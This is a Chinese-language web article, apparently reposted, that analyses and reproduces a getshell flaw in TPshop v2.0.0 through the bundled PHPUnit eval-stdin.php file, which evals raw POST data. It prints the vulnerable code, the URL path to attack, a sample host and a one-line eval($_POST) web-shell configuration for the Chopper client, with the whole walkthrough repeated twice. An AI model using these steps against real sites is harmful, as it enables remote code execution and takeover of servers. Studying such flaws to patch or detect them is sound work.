TPshop商城 Getshell后门文件分析与复现
时间:2023年08月11日
/来源:网络
/编辑:佚名
影响版本:TPSHOP v2.0.0
后门文件:eval-stdin.php 内容:
<?php eval('?>' . file_get_contents('php://input')); ?>
分析:
使用
file_get_contents('php://input'))
接收POST请求的原始数据流
eval函数来执行。
我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:
TPshop商城 Getshell后门文件分析与复现
利用方法:
访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。
TPshop商城 Getshell后门文件分析与复现
那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.
采用写入的话就有点麻烦了。
地址:
http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
配置:
<O><?php eval($_POST[c]);?></O>
TPshop商城 Getshell后门文件分析与复现
TPshop商城 Getshell后门文件分析与复现
后门文件:eval-stdin.php 内容:
<?php eval('?>' . file_get_contents('php://input')); ?>
分析:
使用
file_get_contents('php://input'))
接收POST请求的原始数据流
eval函数来执行。
我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:
TPshop商城 Getshell后门文件分析与复现
利用方法:
访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。
TPshop商城 Getshell后门文件分析与复现
那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.
采用写入的话就有点麻烦了。
地址:
http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
配置:
<O><?php eval($_POST[c]);?></O>
TPshop商城 Getshell后门文件分析与复现
TPshop商城 Getshell后门文件分析与复现
新闻资讯 更多
- 【建站知识】查询nginx日志状态码大于400的请求并打印整行04-03
- 【建站知识】Python中的logger和handler到底是个什么?04-03
- 【建站知识】python3拉勾网爬虫之(您操作太频繁,请稍后访问)04-03
- 【建站知识】xpath 获取meta里的keywords及description的方法04-03
- 【建站知识】python向上取整以50为界04-03
- 【建站知识】scrapy xpath遇见乱码解决04-03
- 【建站知识】scrapy爬取后中文乱码,解决word转为html 时cp1252编码问题04-03
- 【建站知识】scrapy采集—爬取中文乱码,gb2312转为utf-804-03
猜你需要
豫ICP备2021026617号-1
豫公网安备:41172602000185